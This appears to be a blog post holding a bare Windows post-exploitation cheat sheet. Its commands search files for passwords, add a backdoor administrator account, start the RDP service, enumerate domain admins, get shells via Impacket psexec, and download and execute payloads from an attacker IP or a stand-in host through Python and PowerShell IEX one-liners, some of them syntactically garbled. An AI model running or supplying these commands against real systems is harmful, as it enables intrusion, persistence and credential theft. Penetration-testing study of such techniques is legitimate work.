systeminfo | findstr /B /C:"OS Name" /C:"OS Version"
findstr /s /n /i /p /c:"password" *.txt
===================================================================
Using NET
net user /add [username] [password]
net localgroup administrators [username] /add
net start TermService ( start RDP Service)
netsh firewall show state
net group "Domain Admins"
net group "Enterprise Admins"
===================================================================
Use Python like wget
C:\python26\python.exe -c "import urllib2; u = urllib2.urlopen('http://10.11.0.108:4445/35936.py'); localFile = open('local_file', 'w') ; localFile.write(u.read()); localFile.close()"
===================================================================
Getting Shells as a user details
WMI
SMB
Impacket
/usr/share/doc/python-impacket/examples/psexec.py DOMAIN/USER@IP cmd.exe
===================================================================
Transferring files
Powershell
powershell 'IEX(New-Object Net.WebClient).downloadFile('http://whatever.com/file.exe', 'file.exe')'
OR
powershell 'IEX(New-Object Net.WebClient).downloadString('http://whatever.com:1234/file.exe', 'file.exe')'
OR
powershell 'IEX(New-Object Net.WebClient).downloadString("http://whatever.com:1234/file.exe")'
OR
powershell IWR -Uri http://whatever.com/file.exe -OutFile file.exe
==================================================================
No comments:
Post a Comment